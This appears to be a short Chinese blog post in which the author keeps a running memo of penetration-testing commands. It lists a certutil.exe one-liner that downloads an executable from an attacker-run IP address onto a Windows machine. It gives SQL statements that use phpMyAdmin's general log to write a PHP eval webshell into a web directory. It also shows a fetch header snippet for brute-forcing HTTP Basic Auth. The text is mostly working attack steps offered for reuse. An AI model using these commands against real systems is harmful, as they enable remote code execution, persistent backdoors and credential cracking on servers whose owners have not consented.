写在开始

最近搞网安渗透比较多,这里列举一下常用的一些命令,用于备忘

下载文件

在windows上下载文件用的命令

certutil.exe -urlcache -split -f http://172.16.1.28:2020/a.exe a.exe

一句话木马

在phpMyAdmin中写一句话木马的一种方法,是写在phpMyAdmin的日志里

show variables like '%general%';
SET GLOBAL general_log='on'
SET GLOBAL general_log_file='C:/phpStudy/www/cc.php'
SELECT '<?php eval($_POST["cmd"]);?>';

首先是将日志文件修改为放php文件的目录,然后设置为php后缀,然后写个查询,就会把这个查询写入日志了。

在浏览器里爆破Basic Auth

如果要涉及到爆破Basic Auth,那么就需要在fetch的头里加一条,像下面这样。

headers.set('Authorization', 'Basic ' + btoa(username + ":" + password));

然后写个批量发包的就行了。如果有需要,可能需要把btoa单一个函数换成下面这种组合

window.btoa(unescape(encodeURIComponent(string)))

不过,应该用不上,不需要专门url encode之后处理。

写在最后

这个文章也是持续更新状态,如果后面看到了啥命令就会添进来,记录一下这些零零散散的东西

Last modification:August 8, 2023
© Allow specification reprint
如果觉得我的文章对你有用,请随意赞赏